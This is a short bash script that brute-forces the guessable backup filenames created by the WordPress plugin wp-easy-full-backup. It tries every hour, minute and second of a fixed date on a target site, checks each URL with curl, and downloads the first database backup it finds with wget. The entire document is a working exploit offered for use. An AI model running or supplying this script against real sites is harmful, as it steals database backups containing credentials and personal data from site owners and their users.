#!/bin/bash
# database download brute forcer for https://wordpress.org/plugins/wp-easy-full-backup
# start date 01/24/2017   @_larry0
# The plugin wp-easy-full-backup creates wordpress backups that can be guessed
# This script will search for the day's backup and download it.

D=24 #Day
M=01 #Month
Y=2017 #Year

for h in `seq -w 0 23`; do
for y in `seq -w 0 59`; do
for x in `seq -w 0 59`; do
                CPATH="http://$1/wp-content/uploads/wp-easy-full-backup/backup_$D"_"$M"_"$Y"_"$h"_"$x"_"$y.zip"; 
                 echo $CPATH;
                 RESULT=`curl -s --head $CPATH|grep 200`;
                if [ -n "$RESULT" ]; then
                 echo "[+] Database backup $CPATH Found";
                 echo "[+] Received $RESULT";
                 wget $CPATH
                 exit; #break here
        fi;
		x=$x+1;
	done
	y=$y+1;
    done
   h=$h+1;
done